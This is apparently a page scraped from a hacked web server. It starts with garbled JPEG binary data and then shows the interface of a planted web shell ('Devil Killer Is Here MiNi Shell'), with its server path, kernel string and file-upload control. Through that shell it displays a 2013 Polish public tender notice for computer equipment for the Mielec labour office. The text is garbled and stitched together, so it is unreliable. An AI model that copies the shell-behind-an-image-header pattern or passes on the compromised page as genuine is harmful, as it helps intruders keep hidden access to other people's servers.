JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130726/296634-N-2013.html

<p class="kh_header"><b>Mielec: dostawa sprzętu komputerowego</b><br>
<b>Numer ogłoszenia: 296634 - 2013; data zamieszczenia: 26.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Mielcu , ul. F. Chopina 16A, 39-300 Mielec, woj. podkarpackie, tel. 017 7880065, faks 017 7880069.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.mielec.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa sprzętu komputerowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa sprzętu komputerowego dla potrzeb Powiatowego Urzędu Pracy w Mielcu według poniższego wykazu:

Zadanie 1 : Urządzenie biblioteczne - napęd taśmowy - sztuk 1
Wymagania zamawiającego:

Lp.	Parametr	Charakterystyka minimalna
1	Obudowa	Do zamontowania w szafie rack wraz z kompletem uchwytów umożliwiających montaż w ww. szafie, maksymalnie 2U, wbudowany czytnik kodów kreskowych, 2 magazynki na nośniki
2	Napęd	1x LTO5
3	Interfejs	SAS 6GB/s wraz z kablem SAS o długości minimum 2 m umożliwiającym połączenie zaoferowanego urządzenia z serwerem

4	Liczba slotów	Minimum 8, jeżeli licencjonowana jest liczba slotów - wymagane aktywowanie wszystkich slotów

5	Niezawodność urządzenia 
/wg. danych producenta/	
- MSFB : 2 miliony cykli robota dla czynności ładowanie/wyładowanie (load/unload)
- MTBF: 100,000 godzin 

6	Czas zmiany miejsca taśmy 
/wg. danych producenta/	
- średnio maksymalnie 40 sekund (z napędu do magazynka, 
z magazynka do napędu)
7	Dodatkowe	- interfejs do zarządzania poprzez przeglądarkę WWW oraz możliwość zarządzania bezpośrednio z użyciem wbudowanych klawiszy
 i wyświetlacza LCD
- wsparcie dla nośników LTO4 RW, LTO4 WORM
- urządzenie musi współpracować z oprogramowaniem HP Data Protector min. w wersji 7.x (kompatybilność zaproponowanego urządzenia potwierdzona przez producenta oprogramowania lub producenta sprzętu - informacja o prawidłowej współpracy dostępna publicznie przynajmniej na stronie jednego z nich)
- urządzenie musi obsługiwać/rozpoznawać/współpracować z kodami kreskowymi firmy HP o oznaczeniach producenta: Q2009A, Q2010A
- wraz z urządzeniem należy dostarczyć 1 kartę PCI Express,  HBA 2-portową SAS 6 Gb/s  dedykowaną dla serwera HP ProLiant DL360 G6 służąca do podłączenia ww. serwera z zaoferowanym urządzeniem bibliotecznym. 
8	Warunki 
gwarancji	
Trzy lata gwarancji producenta zaoferowanego przedmiotu zamówienia, realizowanej w miejscu jego instalacji, z czasem reakcji do czterech godzin od przyjęcia zgłoszenia, możliwość zgłaszania awarii bezpośrednio u tego producenta, w trybie 24x7x365 (24 godziny na dobę, 7 dni w tygodniu, przez wszystkie dni w roku kalendarzowym).

9	Dokumentacja	
Zamawiający wymaga dokumentacji w języku polskim lub angielskim.
Możliwość telefonicznego sprawdzenia warunków gwarancji po podaniu numeru seryjnego bezpośrednio u producenta lub jego przedstawiciela.


Zadanie 2 : Macierz dyskowa - sztuk 1
Wymagania zamawiającego:

Lp.	Parametr	Charakterystyka minimalna
1	Obudowa	Do instalacji w standardowej szafie RACK 19. Wysokość maksymalnie 2U wraz z kompletem szyn do montażu w szafie Rack.

2	Kontrolery	Dwa  kontrolery posiadające łącznie minimum osiem portów SAS 6 Gb/s do podłączenia serwerów, pracujące w trybie active-active. Wymagane poziomy minimum RAID 0, 1, 5, 6, 10. 

Wraz z macierzą należy dostarczyć 1 kartę PCI Express,  HBA 2-portową SAS 6 Gb/s  dedykowaną dla serwera HP ProLiant DL360 G6 służąca do podłączenia ww. serwera z zaoferowaną macierzą oraz 8 sztuk kabli SAS 6 Gb/s o długości minimum 2m każdy.
3	Cache	- 2GB na kontroler, 
- pamięć cache zapisu mirrorowana między kontrolerami, z opcją zapisu na dysk lub inną pamięć nieulotną lub podtrzymywana bateryjnie przez min. 72h w razie awarii
4	Dyski	Zainstalowane  dyski :
- 12 dysków 600GB SAS 15k RPM Hot-Plug każdy
- możliwość rozbudowy przez dokładanie kolejnych dysków/półek dyskowych (możliwość obsługi łącznie minimum 60 dysków - wydajnych dysków SAS,SSD, ekonomicznych dysków typu SATA (lub NearLine SAS), samoszyfrujących dysków SED dostępnych w ofercie producenta macierzy,
- możliwość mieszania typów dysków w obrębie macierzy oraz półki.
5	Oprogramowanie	Zarządzające macierzą w tym powiadamianie mailem o awarii, umożliwiające maskowanie i mapowanie dysków.
6	Wsparcie dla systemów operacyjnych	MS Windows 2003/ 2008, RedHat Enterprise Linux, SUSE Linux.
Macierz musi znajdować się na liście kompatybilności firmy VMware.
7	Bezpieczeństwo	Ciągła praca obu kontrolerów nawet w przypadku zaniku jednej z faz zasilania. Zasilacze, wentylatory, kontrolery RAID redundantne.
Możliwość przydzielenia większej przestrzeni dyskowej dla serwerów niż fizycznie dostępna (Thin Provisioning).
8	Zasilanie	Redundantne zasilacze o mocy min. 600W
9	Warunki gwarancji 	Trzy lata gwarancji producenta zaoferowanego przedmiotu zamówienia, realizowanej w miejscu jego instalacji, z czasem reakcji do czterech godzin od przyjęcia zgłoszenia, możliwość zgłaszania awarii bezpośrednio u tego producenta, w trybie 24x7x365 (tj. 24 godziny na dobę, 7 dni w tygodniu, przez wszystkie dni w roku kalendarzowym).
W przypadku awarii, dyski twarde pozostają własnością Zamawiającego.
10	Dokumentacja użytkownika	Zamawiający wymaga dokumentacji w języku polskim lub angielskim.
Możliwość telefonicznego sprawdzenia warunków gwarancji po podaniu numeru seryjnego bezpośrednio u producenta lub jego przedstawiciela.

11	Certyfikaty	Zaoferowana macierz musi być kompatybilna z zaproponowanymi serwerami - współpraca potwierdzona przez  producenta/producentów urządzeń.

Zadanie 3 : Serwery Rack do wirtualizacji - 2 sztuk w ramach zamówienia podstawowego oraz 1 sztuki w ramach prawa opcji.
Wymagania zamawiającego:

Lp.	Parametr	Charakterystyka minimalna
1	Obudowa	
- typ RACK o wysokości maks. 2U,
- komplet wysuwanych szyn umożliwiających montaż w szafie rack i wysuwanie serwera do celów serwisowych oraz organizatorem kabli,
- miejsce na  minimum 8 dysków 2,5 cala: SAS, SATA lub SSD wpinanych/wypinanych podczas pracy.

2	Płyta główna	
- możliwość zainstalowania do dwóch ośmiordzeniowych procesorów (8 rdzeni fizycznych na procesor),
- płyta musi być zaprojektowana przez producenta serwera
 i oznaczona jego znakiem firmowym,
- możliwość instalacji dedykowanego przez producenta serwera i znajdującego się w jego ofercie modułu GPU

3	Procesor	
- zainstalowane dwa procesory: minimum 8 rdzeni fizycznych na procesor - klasy x86 dedykowane do pracy z zaoferowanym serwerem umożliwiające osiągnięcie wyniku min. 564 punktów w teście SPECint_rate_base2006 - (CINT2006 Rates - kolumna Baseline) dostępnym na stronie www.spec.org w konfiguracji dwuprocesorowej.
Zamawiający wymaga, aby wynik testu był dostępny publicznie na stronie www.spec.org - Wykonawca jest zobowiązany wskazać w ofercie adres URL, pod którym Zamawiający będzie mógł samodzielnie zweryfikować wydajność zaproponowanego procesora. 

4	Chipset	
Dedykowany przez producenta zaoferowanego procesora do pracy w serwerach dwuprocesorowych.
5	Pamięć RAM	
- zainstalowane minimum: 256 GB RAM ; RDIMM, 1600 MHz,
- płyta powinna obsługiwać minimum do 768GB pamięci RAM, na płycie głównej powinno znajdować się minimum 24 sloty przeznaczone dla pamięci,
- możliwe zabezpieczenia pamięci: Memory Rank Sparing, Memory Mirror, SBEC, Lockstep.

6	Sloty PCI Express	
- minimum 4 wolne złącza PCI Express generacji 3
(po zainstalowaniu wszystkich elementów w oferowanym serwerze).

7	Karta graficzna	
- umożliwiająca rozdzielczość min. 1280x1024.

8	Wbudowane porty	
- minimum 5 portów USB 2.0, 2 porty VGA (1 na przednim panelu obudowy, drugi na tylnym), minimum 1 port RS232.

9	Interfejsy sieciowe	
- minimum 4 porty typu Gigabit Ethernet Base-T z wsparciem dla protokołu IPv6 oraz iSCSI, 
- interfejsy sieciowe nie mogą zajmować żadnego z dostępnych slotów PCI-Express ani utrudniać montaż kart w tych slotach
- porty umieszczone z tyłu obudowy

10	Kontrolery	
- kontroler SAS 6Gb/s posiadający minimum 2 zewnętrzne złącza umożliwiające podłączenie zaoferowanej macierzy dyskowej,
- sprzętowy kontroler dyskowy, posiadający min. 512MB nieulotnej pamięci cache, możliwe konfiguracje poziomów RAID : 0, 1, 5, 6, 10, 50, 60.

11	Wewnętrzna pamięć	
- zainstalowane 2 dyski twarde o pojemności minimum 146GB SAS 15k RPM każdy, skonfigurowane fabrycznie w RAID 1,
- zainstalowany  wewnętrzny moduł dedykowany dla hypervisora wirtualizacyjnego, wyposażony w 2 jednakowe nośniki typu flash o pojemności minimum 2 GB każdy, z możliwością konfiguracji zabezpieczenia synchronizacji pomiędzy nośnikami z poziomu BIOS serwera, rozwiązanie nie może powodować zmniejszenia ilości wnęk na dyski twarde,
- możliwość instalacji dysków twardych SATA, SAS, NearLine SAS i SSD oraz samoszyfrujących dostępnych w aktualnej ofercie producenta serwera.

12	Napęd optyczny	
- wbudowany napęd umożliwiający zapis i odczyt nośników DVD.

13	System diagnostyczny	
- panel umieszczony na froncie obudowy, umożliwiający wyświetlenie informacji o stanie procesora, pamięci, dysków, zasilaniu oraz temperaturze.

14	Zasilanie	
- redundantne zasilacze Hot Plug o mocy minimum 750W każdy.

15	Chłodzenie	
- minimum 6 niezależnie pracujących wentylatorów (zapewniających redundancję), Hot Plug, gwarantujące pracę ciągłą serwera (wg danych producenta) w maksymalnej temperaturze otoczenia do minimum 35oC.  

16	Bezpieczeństwo	
- zainstalowany moduł TPM,
- wbudowany czujnik otwarcia obudowy.

17	

Zarządzanie zdalne	
Serwer wyposażony w sprzętową kontrolę zdalnego dostępu - kartę zarządzającą - niezależną od zainstalowanego na serwerze systemu operacyjnego posiadającą dedykowany port RJ-45 Gigabit Ethernet umożliwiającą:
- zdalny dostęp do graficznego interfejsu karty zarządzającej, przy pomocy przeglądarki internetowej (web),
- zdalne monitorowanie i informowanie o statusie serwera (m.in. prędkości obrotowej wentylatorów, konfiguracji serwera, ),
- szyfrowane połączenie (SSLv3) oraz autentykacje i autoryzację użytkownika,
- możliwość podmontowania zdalnych wirtualnych napędów(np. plik *.iso - obraz systemu),
- wirtualną konsolę z dostępem do myszy, klawiatury,
- wsparcie dla IPv6,
- wsparcie dla WSMAN (Web Service for Managament); SNMP; IPMI2.0, VLAN tagging, Telnet, SSH,
- wsparcie dla dynamic DNS,
- wysyłanie do administratora powiadomień o awarii lub zmianie konfiguracji sprzętowej,
- możliwość podłączenia lokalnego poprzez złącze RS-232,
- w przypadku awarii i wymiany serwisowej, np.: karty sieciowej, kontrolera RAID dla dysków wewnętrznych lub płyty głównej możliwość wczytania, poprzednich ustawień dla ww. komponentów, z nośnika danych, np. pamięci typu flash. Jeśli funkcjonalność ta wymaga dodatkowych płatnych komponentów lub usług to powinny one zostać uwzględnione w ofercie.

18	Inne	
Serwer musi wspierać następujące systemy operacyjne: Windows Server 2003, 2008, 2008R2, 2012; VMware ESXi 5.x; Serwer musi znajdować się na liście kompatybilności firmy VMware.

19	Gwarancja	
Trzy lata gwarancji producenta zaoferowanego przedmiotu zamówienia, realizowanej w miejscu jego instalacji, z czasem reakcji do czterech godzin od przyjęcia zgłoszenia, możliwość zgłaszania awarii bezpośrednio u tego producenta, w trybie 24x7x365 (24 godziny na dobę, 7 dni w tygodniu, przez wszystkie dni w roku kalendarzowym).
W przypadku awarii, dyski twarde pozostają własnością Zamawiającego.
20	Dokumentacja	
Zamawiający wymaga dokumentacji w języku polskim lub angielskim.
Możliwość telefonicznego sprawdzenia konfiguracji sprzętowej serwera oraz warunków gwarancji po podaniu numeru seryjnego bezpośrednio u producenta lub jego przedstawiciela.


2.	Zamawiający wymaga, aby Wykonawca dostarczył przedmiot zamówienia:
-wraz z pełnym kompletem oprogramowania i dodatkowych elementów dostarczonych przez producenta,
-fabrycznie nowy, nie używany wcześniej w innych projektach,
-zakupiony w oficjalnym kanale sprzedaży producenta, do którego należy Polska, co zgodnie z ww. wymogami oznacza, że będzie to sprzęt nowy, posiadający stosowny pakiet usług gwarancyjnych kierowanych do użytkowników z tego obszaru oraz posiadający deklarację zgodności dla oferowanego sprzętu,
-gotowy do pracy bezpośrednio po dostawie,
-posiadający wszelką dokumentację i certyfikaty wymagane przepisami prawa.
3.	Zamawiający nabywa prawo do korzystania z oprogramowania wchodzącego w skład sprzętu komputerowego - oprogramowanie do zarządzania danym sprzętem komputerowym na czas nieokreślony, bez możliwości wypowiedzenia prawa do użytkowania, na polach eksploatacji określonych przez producenta oprogramowania. 
4.	Dostawa sprzętu oraz jego serwisowanie w okresie gwarancji będą realizowane w sposób określony w załączniku nr 4 do zaproszenia - wzorze umowy. 
5.	Wykonawca winien zapoznać się z warunkami określonymi w załączniku nr 4 do SIWZ - wzór umowy.
6.	Miejsce realizacji: Powiatowy Urząd Pracy w Mielcu, ul. Chopina 16A, 39-300 Mielec.
7.	Zamawiający przewiduje możliwość zwiększenia zakresu zamówienia podstawowego z zastosowaniem prawa opcji o którym mowa w art. 34 ust 5 ustawy. Prawem opcji jest możliwość zwiększenia zamówienia podstawowego na warunkach zawartej umowy o 1 sztukę serwera Rack do wirtualizacji określonego w zadaniu 3. Zamawiający uzależnia możliwość skorzystania z prawa opcji od posiadania środków finansowych na ten cel. 
8.	Zamawiający uprawniony jest do skorzystania z prawa opcji do dnia 15 listopada 2013 r. 
9.	Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji zawartej umowy. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu. Warunkiem uruchomiania prawa opcji jest oświadczenie woli Zamawiającego wykonania zamówienia w ramach prawa opcji i złożenie odpowiedniego zamówienia częściowego wykraczającego poza dostawę sprzętu komputerowego stanowiącego zamówienie podstawowe..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 48.82.00.00-2, 30.23.80.00-6, 30.23.31.41-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowo warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w rozdziale XVI ust.1 pkt 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowo warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w
postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w rozdziale XVI ust.1
pkt 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowo warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w
postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w rozdziale XVI ust.1
pkt 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowo warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w
postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w rozdziale XVI ust.1
pkt 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowo warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w
postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w rozdziale XVI ust.1
pkt 1 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
2. W przypadku udzielenia pełnomocnictwa - oryginał pełnomocnictwa lub kopia potwierdzona przez notariusza. 
3. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma
siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w Rozdziale XVI ust. 4 SIWZ zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania zmiany zawartej umowy w przypadku:
a)	wystąpienia strajków, kryzysu gospodarczego lub działania siły wyższej w skutek czego  konieczna będzie zmiana terminu wykonania przedmiotu umowy. W takim przypadku przesunięcie terminu może nastąpić o okres w jakim wykonywanie przedmiotu umowy było niemożliwe ze względu na działanie tych zdarzeń. Wykonawca jest zobowiązany niezwłocznie poinformować Zamawiającego o zaistnieniu tych faktów. 
b)	przerw w realizacji lub zmian terminu realizacji przedmiotu umowy wynikających z innych zdarzeń nie możliwych do przewidzenia w chwili zawarcia umowy - W takim przypadku przesunięcie terminu może nastąpić o okres w jakim wykonywanie przedmiotu umowy było niemożliwe ze względu na działanie tych zdarzeń.
c)	gdy nastąpiła zmiana producenta lub producent zakończył produkcję, albo skończyła się dostępność zaoferowanego przez Wykonawcę przedmiotu i zachodzi konieczność zastąpienia go innym, pod warunkiem, że spełnia wymagania określone przez Zamawiającego w SIWZ           a jego zastosowanie nie wiąże się ze zmianą wynagrodzenia,
d)	zmiany ustawowej stawki podatku VAT. W takim przypadku kwota brutto wynagrodzenia wykonawcy zostanie odpowiednio dostosowana,
e)	gdy nastąpi zmiana danych wykonawcy i osób do kontaktu/współpracy,
f)	gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
g)	gdy nastąpi zmiana osób upoważnionych do wykonywania i nadzorowania postanowień zawartych w niniejszej umowie.
2. Zmiany przewidziane w Umowie mogą być inicjowane przez zamawiającego lub przez wykonawcę.</p>
